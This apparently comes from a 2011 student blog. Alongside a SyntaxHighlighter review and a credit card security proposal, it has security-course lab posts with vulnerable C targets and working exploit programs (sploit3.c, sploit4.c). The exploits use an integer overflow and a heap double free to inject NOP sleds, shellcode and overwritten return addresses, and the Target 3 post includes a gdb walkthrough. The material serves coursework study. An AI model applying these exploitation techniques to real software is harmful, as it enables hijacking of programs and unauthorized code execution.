Saturday, March 26, 2011

SyntaxHighlighter Review

I have finally managed to display source code correctly by using Syntax Highlighter. [1] I've gone through absolute hell to actually get this thing working though. I don't know much about HTML so you can imagine that I had quite a frustrating journey. I went through 6 different blogs which all showed different ways of installing it, none of them worked with blogger unfortunately. I finally found a blog that showed how to correctly install it on blogger.

Installation
The blog is called heisencoder [2], check it out if you'd like to learn how to install syntax highlighter on your blog too!

Demo


//code is displayed like this!


Impressions
It's nice, the code is displayed mostly correctly(see issues section). The code is displayed with line numbers, and alternating colors so you can separate one line from another.

It also has a "view plain" option integrated, this allows you to see the code in plain text and change around the source code before you print it. There is also a print feature, which if you click the print button, will print only the source code and ignore the rest of the blog. Which is awesome, no more parsing out the code, pasting it into notepad, and hitting print in order to save some trees. Finally there is a "?" option that will show you which version of SyntaxHighlighter the blogger is using, version 1.5.2 in my case.

Issues
Despite having it installed correctly, there are still some issues I have with SyntaxHighlighter. The first issue is with the actual code that it displays, if there are include statements in your code, it will insert HTML end tags as if the include statements were in HTML. Very frustrating to say the least, here is an example. 



#include

As you can see it inserted a closing statement to my include stdio.h statement at the beginning of the program! It will do this with every include statement, so the more you have, the more bloated the code will look at the bottom. I noticed this problem doesn't happen on other blogging websites so it may be bloggers problem.

The other issue is with the pre tag, which must be included in order to separate the code from normal text, you must give it a name in quotations and a class type, also in quotations. I used C so the class would be "cpp". The name is where the problem arises, I tried naming a program "target3.c" and pasting the code between the pre tags. When the post was published, the code would be displayed as normal text as if ignoring SyntaxHighlighter completely! The solution that I found was to name everything "code" as this works every time.

That's all for now, I haven't played around with SyntaxHighlighter too much yet so if anything else comes up I'll be sure to post. I'm just glad I have a somewhat nice way to display source code.

EDIT: So I just found out I have an old version of SyntaxHighlighter, version 1.5.2. This may be the problem, I will look into updating the sources so that they point to an updated version. Until then, this is my short 1.5.2 SyntaxHighlighter review.

References
[1] http://alexgorbatchev.com/SyntaxHighlighter/
[2] http://heisencoder.net/2009/01/adding-syntax-highlighting-to-blogger.html
Posted by Artemisk at 5:57 PM 0 comments

Tuesday, March 22, 2011

Reforming Credit Card Security

So for a midterm report, we had a choice between writing an ACM paper on reforming the social security number system, credit card security, or finding an exploit on school campus/computer system somehow. I went with the boring choice (I had about two days to complete it so I didn't want to travel to campus all the time), the credit card. Regardless, I came up with some really good ideas in my opinion. I wish I could just post the entire article here but it would probably be all screwed up thanks to the Blogger display setting. With this paper being an ACM paper, all my information is located there such as name, address, e-mail, phone number, and I really don't want people contacting me, unless it's through e-mail or comments of course :).

I'll give you a summary since you probably don't want to read my 4 page, single spaced paper as my writing is absolutely atrocious. I came up with two systems, one that would work when you're purchasing in store, and the other when you're purchasing online. These two systems would use different mechanics to accomplish the security.

While in a store this new system would use two biometric systems to accomplish the security. The first is a fingerprint scanner and the second is a camera. So one would slide the credit card across the reader, then to confirm ones identity, the potential customer would put his finger onto the scanner and at the same time have his picture taken by the camera (which would be integrated in the fingerprint scanner). This would replace the little signature pad that we are all used to and no one really pays attention to (especially the cashier), perhaps it would save a little time too. This ensures that the person is buying whatever is the owner of the card, if he or she isn't, then hopefully the fingerprint will be rejected. It's possible for the fingerprint scanner to be fooled however. [1] If it is, the camera is there to catch the face of the guilty suspect. If your card is stolen, then the store will have their fingerprint and/or picture for the authorities to use to track down the culprit. Although privacy is always a concern, the paper asked for security, not privacy.

Our online system uses a central credit card website such as VISA.com to hold all of your credit card information. If you want to purchase something from the internet, from Amazon for example, you must generate a code. This code is generated by giving VISA the total amount of the purchase ($52.69). VISA will generate a purchasing code using your account information and the amount. Once this is done, you can paste the code into Amazon's checkout section and pay Amazon the total amount or if you've made a mistake, it will either return the difference, or ask for more money before they ship the product. This ensures that only VISA has all of your information, it isn't stored anywhere else (such as Amazon, Barnes & Noble), etc. We could also employ a confirmation system by either mail or text message. Visa would alert you that you are about to make a purchase and you must either send back a confirmation or denial of payment.

The credit card is also redesigned. On the front, your name, expiration date, and bank logo are the only things that are listed, on the back is the familiar magnetic strip we are all used to. We don't need the account numbers on the front, they haven't been used since the manual credit card imprinter days. They also won't be necessary since we have the alternate online purchase method. The back of the card doesn't have the CCV number that also won't be necessary in our new system. The signature on the back to prove ownership and consent to the VISA terms and conditions is useless, you have your name on the front to prove ownership. The expiration date is to tell you when it's time to change cards as the magnetic strip wears out eventually through use.

My article goes into more depth than this and covers many other biometric devices that were looked at. If anyone really wants to take a look at it, please comment and I'll post it here albeit with identifying information removed.

References
[1] http://www.metacafe.com/watch/2350125/mythbusters_overcoming_a_fingerprint_security_system/
Posted by Artemisk at 7:22 PM 0 comments

Blogger and Source Code

Blogger by itself is an abomination when it comes to posting code, it deletes my include statements outright and god knows what else it does! This means I'm on the desperate hunt for a new way to display source code on a website such as this. I'll be using this page to test various javascripts that I've found and see which one is the best or whichever actually accurately displays code.
Posted by Artemisk at 7:13 PM 0 comments

Target 4

Explanation coming soon, I've been really busy, stay tuned!

//target4.c
#include 
#include 
#include 
#include 
#include "tmalloc.h"

/*
 * strlcpy() from OpenBSD-current:
 * $OpenBSD: strlcpy.c,v 1.5 2001/05/13 15:40:16 deraadt Exp $
 *
 * Copy src to string dst of size siz.  At most siz-1 characters
 * will be copied.  Always NUL terminates (unless siz == 0).
 * Returns strlen(src); if retval >= siz, truncation occurred.
 *
 * HINT: This come from OpenBSD; there is no buffer overflow within
 *       this function; the bug is somewhere else ...
 */
static size_t
obsd_strlcpy(dst, src, siz)
        char *dst;
        const char *src;
        size_t siz;
{
        register char *d = dst;
        register const char *s = src;
        register size_t n = siz;

        /* Copy as many bytes as will fit */
        if (n != 0 && --n != 0) {
                do {
                        if ((*d++ = *s++) == 0)
                                break;
                } while (--n != 0);
        }

        /* Not enough room in dst, add NUL and traverse rest of src */
        if (n == 0) {
                if (siz != 0)
                        *d = '\0';              /* NUL-terminate dst */
                while (*s++)
                        ;
        }

        return(s - src - 1);    /* count does not include NUL */
}



int foo(char *arg)
{
  char *p;
  char *q;

  if ( (p = tmalloc(500)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    }
  if ( (q = tmalloc(300)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    } 

  tfree(p);
  tfree(q);
  
  if ( (p = tmalloc(1024)) == NULL)
    {
      fprintf(stderr, "tmalloc failure\n");
      exit(EXIT_FAILURE);
    }

  obsd_strlcpy(p, arg, 1024);

  tfree(q);

  return 0;
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target4: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv[1]);

  return 0;
}


//sploit4.c
#include 
#include 
#include 
#include 
#include "shellcode.h"

#define TARGET "/tmp/target4"

int main(void)
{
 
  char *args[3];
  char *env[1];
  char buf[1024];
  int i;
  int fake, left, right;


left = 0x08049bc8;
right = 0xbffffa8c;
fake = right + 1;

for (i = 0; i< 1024; i++){
  if(i < 2) {*(buf + i) = '\x90';} 
   else if (i < 4) 
    {
    memcpy((buf + i), "\xeb\x03", 2);
    i++;
    } 
    else if (i < 8) {*(buf + i) = fake >>(( i-4 ) * 8);} 
    else if (i < (504 - strlen(shellcode))){*(buf+i) = '\x90';} 
    else if (i < 504) {*(buf+i) = shellcode[i - 504 + strlen(shellcode)];} 
    else if (i < 508) {*(buf + i) = left >> ((i - 504) * 8);} 
    else if (i < 512) {*(buf + i) = right >> ((i - 508) * 8);} 
    else if (i < 1023) {*(buf + i) = '\x90';} 
    else {*(buf + i) = '\x00';}
    }

  args[0] = TARGET; args[1] = buf; args[2] = NULL;
  env[0] = NULL;

  if (0 > execve(TARGET, args, env))
    fprintf(stderr, "execve failed.\n");

  return 0;
}
Posted by Artemisk at 6:49 PM 1 comments

Target 3

Target 3 was my favorite of the targets that my professor assigned so far, it combines a lot of things read about into one project that really got me thinking and kicking myself at how simple it was when you have it all figured out. Here is the Target 3 that was assigned below.

//Target3.c
#include 
#include 
#include 

struct widget_t {
  double x;
  double y;
  int count;
};

#define MAX_WIDGETS 1000

int foo(char *in, int count)
{
  struct widget_t buf[MAX_WIDGETS];

  if (count < MAX_WIDGETS) 
    memcpy(buf, in, count * sizeof(struct widget_t));

  return 0;
}

int main(int argc, char *argv[])
{
  int count;
  char *in;

  if (argc != 2)
    {
      fprintf(stderr, "target3: argc != 2\n");
      exit(EXIT_FAILURE);
    }

  /*
   * format of argv[1] is as follows:
   *
   * - a count, encoded as a decimal number in ASCII
   * - a comma (",")
   * - the remainder of the data, treated as an array
   *   of struct widget_t
   */

  count = (int)strtoul(argv[1], &in, 10);
  if (*in != ',')
    {
      fprintf(stderr, "target3: argument format is [count],[data]\n");
      exit(EXIT_FAILURE);
    }
  in++;                         /* advance one byte, past the comma */
  foo(in, count);

  return 0;
}


Here we see a potential exploit, if we can somehow get the 'count * sizeof(struct widget_t)' over the correct buffer size, we can inject our own code and take control. There are two obstacles in this matter, the first being that we cannot get the count to be over 999 due to the 'if countstruct widget_t buf[MAX_WIDGETS]' states that we can only have 1000 widget_t's this means the total buffer size is 20000 (1000 * 20). We now have a number that we can use in order to gauge our exploit.

One other thing to note is in the main program, it requires the argument to be in a [count],[data] format. Note the ',' it must be in the argument in order to work. You can see the comma is actually used in order to separate the count and data arguments from each other and isn't read in as either count or data thanks to the in++ statement. As the comment next to the in++ statement, it only advances one byte.

Gdb examination of Target3.c

You can use 999 for count and any char variable, I'm quite partial to 'a' ('\x61') since that is what my professor used in his example for target1.c a while ago. Anyway, use those arguments and set a break point at foo. Examine foo's buf by typing 'x buf'. This will allow you to see where the local variables start, we will be using this memory location, write it down. You can also examine the eip, ebp and local variables and your parameters to see if everything is in order. While we're here we can also play around with the count variable, this is also where things get interesting. We can change count by using the 'set' command that Gdb provides. Here we can also set it to a number beyond 20000 bytes, but this will just cause a seg fault or some other problem. We want to figure out how to get the 'count * sizeof(struct widget_t)' to be over 20000 bytes, yet we want the count be under 1000. How is this possible you might ask? Integer overflows. [2] We can actually use the integer ability to "wrap-around" the negative integer spectrum and get a positive 'count * sizeof(struct widget_t)' in order to overflow it! It is all thanks to the fact that we can multiply the count by sizeof(struct widget_t) that we are able to do so.

But what is the number? That takes a bit of experimentation, first, let's set count to the most negative integer we possibly can and see what we get. [3] -2147483647 is the most negative number, when we set this to count we get a 'count * sizeof(struct widget_t)' of 20. This is 20000 bytes below what we need, but remember, 1 count makes 20 bytes in the end. Meaning count = -2147483647 is the same as count = 1. So the idea is now clear, count needs to be -2147482647. This will satisfy the if statement in foo, and allow us to overflow struct_t's buffer by 20 bytes or more if we choose. Below is our changed Sploit3.c to fit the things we stated. 

//Sploit3.c
#include 
#include 
#include 
#include 
#include "shellcode.h"

#define TARGET "/tmp/target3"

int main(void)
{
 char *args[3];
 char *env[1];
 char *count;

args[1] = malloc (20028);

int i, j;

args[1][0] = '-';
args[1][1] = '2';
args[1][2] = '1';
args[1][3] = '4';
args[1][4] = '7';
args[1][5] = '4';
args[1][6] = '8';
args[1][7] = '2';
args[1][8] = '6';
args[1][9] = '4';
args[1][10] = '7';
args[1][11] = ',';

for (i = 12; i < 20024 - strlen(shellcode); i++) { 
args[1][i] = 0x90; 
} 
for (j = 0, i=i; j < strlen(shellcode); i++, j++) { 
args[1][i] = shellcode[j]; 
}  
args[1][20027] = 0xbf; 
args[1][20026] = 0xff; 
args[1][20025] = 0x62; 
args[1][20024] = 0x20; 
 
args[1][20028] = '\x00';    

args[0] = TARGET; args[2] = NULL;  env[0] = NULL;   

if (0 > execve(TARGET, args, env))
   fprintf(stderr, "execve failed.\n");

return 0;
}

Examining sploit3.c
First thing I did was to set the memory allocation to 20028, this was necessary because I needed enough bytes to fill the parameters and local variables enough so that the shellcode and fill NOPs everywhere until it gets to the shellcode. So we set the first argument which will be 'count' to our negative wrap around number. We also don't forget to include the comma or else the program won't work and will return an error that it needs two arguments. Next we fill the parameters and local variables with our NOPs. This is the first for loop statement.

The second for loop takes care of the shellcode. We set the first for loop to stop where we have enough room to inject our shellcode and new eip. The second for loop injects our shellcode. Then we have another set of arguments which set our eip to whatever we choose (the starting address of the buf). In this case we want to set to the beginning of the local variables so that it will return there, skip through the NOPs, reach the shellcode, and execute it! Finally the last argument is the terminator, which is also necessary otherwise an error will be returned.

That's it for our in depth look at Target3.c. I hope you enjoyed reading about it as much as I enjoyed working on this one! I'm also looking for a better way to make code more readable on blogger.com I know it's terrible to read on here. Going to read on some HTML & HTML 5 over the summer so I'll be sure to post how that is going. Cheers, and good luck on your hacking escapades!

References
[1] http://msdn.microsoft.com/en-us/library/cc953fe1.aspx
[2] http://www.phrack.com/issues.html?issue=60&id=10
[3] http://msdn.microsoft.com/en-us/library/7fh3a000%28v=vs.80%29.aspx
Posted by Artemisk at 5:36 PM 0 comments
Subscribe to: Posts (Atom)